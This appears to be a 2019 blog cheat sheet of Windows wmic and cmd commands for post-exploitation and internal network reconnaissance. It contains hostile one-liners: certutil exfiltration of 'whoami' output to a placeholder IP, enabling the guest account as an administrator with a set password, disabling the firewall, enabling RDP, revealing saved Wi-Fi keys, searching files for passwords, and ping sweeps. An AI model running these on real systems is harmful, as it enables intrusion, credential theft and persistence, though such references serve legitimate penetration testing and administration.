
Windows command summary

2019-12-06  CSeroad

Preface

I have collected some commands here; not only wmic commands, but other interesting commands as well.

wmic command summary

View installed patch (hotfix) details

wmic qfe list

List processes

wmic process list brief

Get process paths

wmic process get description,executablepath
wmic process where name="java.exe" get executablepath

Find a PID by application name

wmic process where name="cmd.exe" get processid,executablepath,name

Get full details of a process

wmic process where name="chrome.exe" list full

Create a new process

wmic process call create notepad
wmic process call create "C:\Program Files\Tencent\qq.exe"
wmic process call create "shutdown.exe -r -f -t 20"

Terminate a specified process

wmic process where name="qq.exe" call terminate
wmic process where processid="2316" delete
wmic process 2316 call terminate

View startup items

wmic startup

View shares

wmic share get name,path

View installed software and versions

wmic product get name,version

Check whether the machine is a virtual machine

wmic bios list full | find /i "vmware"

Get the computer name

wmic path win32_computersystem get dnshostname

Get the operating system name

wmic path win32_operatingsystem get name

Check whether the system is 32-bit or 64-bit

wmic path win32_operatingsystem get osarchitecture

Get the system domain name

wmic path win32_computersystem get domain

Get antivirus details

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe

Base64 encode

certUtil -encode 1.jsp 1.txt

Base64 decode

certUtil -decode 1.txt 1.jsp

cmd command summary

Redirect output (including errors) to a file

net user > a.txt 2>&1

View processes with their hosted services

tasklist /svc

Kill a process by image name

taskkill /f /im shell.exe

Kill a process by PID

taskkill /pid 5396 /F

Trace the route to a host

tracert IP

Query DNS

nslookup domain

View logged-on users (sessions)

qwinsta

View the routing table

route print

View scheduled tasks

schtasks /query /fo list /v

Similar to the vim workflow: type the file content, press Ctrl+Z to finish, and the file is created

copy con test.vbs

Recursively search for a file

cd /d E: && dir /b /s Logon.aspx

DNS out-of-band command execution

for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i

Command execution when the host has no outbound network access (results are written to files next to the located file)

cd c:\ && for /f %i in ('dir /s /b c:fastjson-1.2.47.jar') do (echo %i> %i.path.txt) & (ipconfig > %i.ipconfig.txt)

Enable the guest account

net user guest /active:yes
net user guest Qax@123456
net localgroup administrators guest /add

Recursively search file contents

findstr /si password config.* *.ini *.txt

Lists files with the given extensions whose contents contain the keyword "password".

Check whether RDP (3389) is enabled

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

0x1 means disabled, 0x0 means enabled.

Modify the registry to enable RDP (3389)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Two variants are collected here.

Find the port used by the TermService (Remote Desktop) service

tasklist /svc | findstr "TermService"
netstat -ano | find "PID"

Replace PID with the process ID returned by the first command.
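The two commands above leave the PID substitution to the operator. As an added example that is not part of the original post, the following batch script chains them: it looks up the PID hosting TermService and prints only the listening sockets that belong to it, which is a quick way to audit which port Remote Desktop is actually bound to. It assumes an elevated cmd prompt so that netstat -ano can show owning PIDs.

```batch
@echo off
rem Added example (not from the original post): resolve the PID that hosts
rem TermService and list the TCP ports it is listening on.
rem Assumes an elevated cmd prompt.
setlocal enabledelayedexpansion

set "TSPID="
rem tasklist CSV rows look like: "svchost.exe","1234","TermService,UmRdpService"
rem The second comma-separated field is the PID; %%~p strips the quotes.
for /f "tokens=2 delims=," %%p in ('tasklist /svc /fo csv /nh ^| findstr /i "TermService"') do (
    set "TSPID=%%~p"
)

if not defined TSPID (
    echo TermService is not running.
    exit /b 1
)

echo TermService runs in PID !TSPID!
rem netstat -ano TCP rows: Proto  Local Address  Foreign Address  State  PID
rem Filtering on LISTENING also drops UDP rows, which have no State column.
for /f "tokens=1,2,4,5" %%a in ('netstat -ano ^| findstr /i "LISTENING"') do (
    if "%%d"=="!TSPID!" echo   %%a %%b %%c
)
endlocal
```

If the printed local address is not port 3389, the RDP listening port has been changed from the default, which is worth recording when auditing a host.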

Batch scan for live hosts on the internal network

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"

Batch net view: output machine names and IPs

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

Batch search for live hosts across a /16 (class B) range; save this as a batch file.

@echo off
rem Outer loop walks the third octet, inner loop samples the fourth octet in steps of 25
for /l %%i in (1,1,255) do (
    for /l %%j in (1,25,255) do (
      ping -w 1 -n 1 10.0.%%i.%%j | find /i "ttl="
    )
)

Disable the firewall

Windows Server 2003 and earlier

netsh firewall set opmode disable

Versions after Windows Server 2003

netsh advfirewall set allprofiles state off

Add a firewall rule

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=6666

View firewall policy

netsh firewall show config
netsh firewall show state

View saved wireless passwords

netsh wlan show profiles
netsh wlan show profiles name="profiles" key=clear

Replace profiles with a profile name from the first command's output.

Internal network penetration

Enable the telnet client

dism /online /Enable-Feature /FeatureName:TelnetClient

View domain controllers

net group "Domain controllers"

View the current domain network environment

net view /domain

View domain administrators

net group "domain admins" /domain

View all machine names in the domain

net group "domain computers" /domain

Find internal assets corresponding to external domains

for /f "delims=" %i in (domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"test.com" >> service.txt

domains.txt holds the domain names collected externally; the for loop pings each domain and appends the results to service.txt.

Find internal IP assets

for /f "delims=" %i in (web.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> out.txt

To be added......
